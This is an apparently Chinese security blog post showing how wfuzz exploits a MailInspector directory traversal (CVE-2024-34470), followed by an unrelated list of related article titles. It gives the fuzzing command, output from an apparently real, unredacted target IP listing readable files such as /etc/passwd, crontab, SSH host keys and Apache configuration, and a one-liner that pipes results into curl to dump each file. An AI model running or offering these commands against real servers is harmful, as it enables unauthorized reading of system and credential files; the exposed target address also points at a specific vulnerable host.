「一個wfuzz應用案例」拿到目錄遍歷漏洞後用wfuzz爆破

sesmof發表於2024-06-15

┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://187.63.160.15/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                         
=====================================================================

000000031:   200        1 L      2 W        28 Ch       "/etc/ld.so.conf"                                                               
000000017:   200        9 L      54 W       687 Ch      "/etc/fstab"                                                                    
000000016:   200        13 L     53 W       404 Ch      "/etc/crontab"                                                                  
000000029:   200        131 L    446 W      3523 Ch     "/etc/init.d/httpd"                                                             
000000030:   200        476 L    1763 W     14066 Ch    "/etc/init.d/mysql"                                                             
000000038:   200        36 L     48 W       1645 Ch     "/etc/passwd"                                                                   
000000053:   200        2 L      4 W        48 Ch       "/etc/resolv.conf"                                                              
000000057:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000058:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000020:   200        24 L     88 W       560 Ch      "/etc/httpd/conf.d/php.conf"                                                    
000000072:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000071:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000069:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000066:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000070:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000065:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000062:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000039:   200        182 L    491 W      4608 Ch     "/etc/php.ini"                                                                  
000000061:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000021:   200        991 L    4834 W     33726 Ch    "/etc/httpd/conf/httpd.conf"                                                    
000000143:   200        8 L      6 W        306 Ch      "/usr/local/Zend/etc/php.ini"                                                   

Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0

參考CVE-2024-34470
補充：AI潤色版命令

wfuzz -u http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0 | grep '"/' | awk '!/0 L/' | cut -d '"' -f 2 | xargs -I {} sh -c 'echo {},"<--------"; curl -s http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..{}'

網站模糊測試爆破工具Wfuzz
2017-07-19
網站
linux下遍歷目錄
2014-10-28
Linux
Object-C,遍歷目錄
2015-11-29
Object
java基礎：遞迴應用---遍歷檔案目錄
2015-02-02
Java遞迴
K8s kubectl 複製命令曝目錄遍歷漏洞
2019-04-01
K8S
rails應用遍歷Controllers目錄並取出所有的Controller和action
2007-04-05
AIController
php -- glob遍歷目錄函式
2017-06-09
PHP函式
python 遞迴遍歷目錄
2015-05-26
Python遞迴
PHP遍歷目錄和檔案
2011-12-21
PHP
遍歷某一個指定目錄下的所有子目錄和檔案（遞迴）
2015-03-12
遞迴
Jboss下將某個應用目錄配置為根目錄
2013-07-23
遍歷目錄下的所有檔案
2020-12-09
php無限遍歷目錄-修正版
2014-02-20
PHP
目錄遍歷-基於Pikachu的學習
2024-05-06
遍歷檔案Java中遍歷出指定目錄中的所有檔案
2013-05-27
Java
【JavaScript實用技巧（一）】迴圈遍歷與跳出迴圈遍歷
2021-10-26
JavaScript
二叉樹的遍歷及應用
2020-11-05
二叉樹
php遍歷指定目錄中的內容2
2017-11-12
PHP
使用python遍歷一個目錄下所有的檔案併合並內容
2016-09-26
Python
【筆記】遍歷二叉樹的應用
2017-10-29
筆記二叉樹
面試題：給你個id，去拿到name，多叉樹遍歷
2019-03-04
面試題
網路安全中的目錄遍歷指什麼?
2022-09-07
kubernetes部署第一個應用案例
2022-01-04
檔案上傳下載中的安全問題(上傳漏洞與目錄遍歷攻擊)
2015-01-27
我打造了一個線上簡歷生成應用
2021-03-07
Oracle Developer 6i 基礎應用,含遍歷BLOCK
2011-03-01
OracleDeveloperBloC
層序遍歷在ExtJs的TreePanel中的應用
2009-10-15
JS
函式計算實踐——一個應用案例
2020-12-30
函式
[應用案例]OT應用案例之dasdig
2019-05-11
jQuery 遍歷 – 後代
2022-08-01
jQuery
ast 後序遍歷
2024-06-06
AST
面試題目-遍歷，點選
2018-06-15
面試題
Django中型專案的目錄結構和一個應用建立啟動示例
2024-05-25
Django
二叉樹建立，前序遍歷，中序遍歷，後序遍歷思路
2017-02-18
二叉樹
二叉樹的建立、前序遍歷、中序遍歷、後序遍歷
2008-01-03
二叉樹
[應用案例]一個基金管理工具，做來自己用的
2019-05-11
Python自學之路：遞迴、棧和佇列遍歷目錄
2018-09-22
Python遞迴佇列
網路安全系列之三十六目錄遍歷攻擊
2017-11-14

「一個wfuzz應用案例」拿到目錄遍歷漏洞後用wfuzz爆破

相關文章